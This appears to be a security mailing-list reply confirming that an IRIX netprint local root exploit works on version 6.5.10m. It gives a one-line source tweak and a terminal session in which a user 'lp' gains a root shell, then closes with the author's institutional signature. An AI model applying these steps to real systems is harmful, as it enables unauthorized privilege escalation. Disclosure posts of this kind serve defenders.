I tested against 6.5.10m and it works.
just add
fprintf(symbol,"void ListAllPrinters(){}\n");
to the list of symbols and execute the xploit as user "lp":
% whoami
lp
% ./xnetprint /bin/sh
[(IRIX)netprint[] local root exploit, by: v9[[EMAIL PROTECTED]]. ]
[*] making symbols source file for netprint to execute.
[*] done, now compiling symbols source file.
[*] done, now checking to see if the symbols source compiled.
[*] done, now executing netprint.
[*] success, uid: 0, euid: 0, gid: 0, egid: 0.
# whoami
root
The "lp" account, however, is no longer left open by default since 6.5, AFAIK.
Thomas.
---
Max-Born-Institut fuer Nichtlineare Optik und Kurzzeitspektroskopie
Max-Born-Strasse 2A, D-12489 Berlin, Germany
Leiter EDV - Thomas-Martin Kruel
mailto: [EMAIL PROTECTED] Tel. 030 / 6392-1540, Fax: -1509, Funk: 0170 /
9247486
Support: http://www.mbi-berlin.de/edv
mailto: [EMAIL PROTECTED] Tel. 030 / 6392-1555, Pager: [EMAIL PROTECTED]
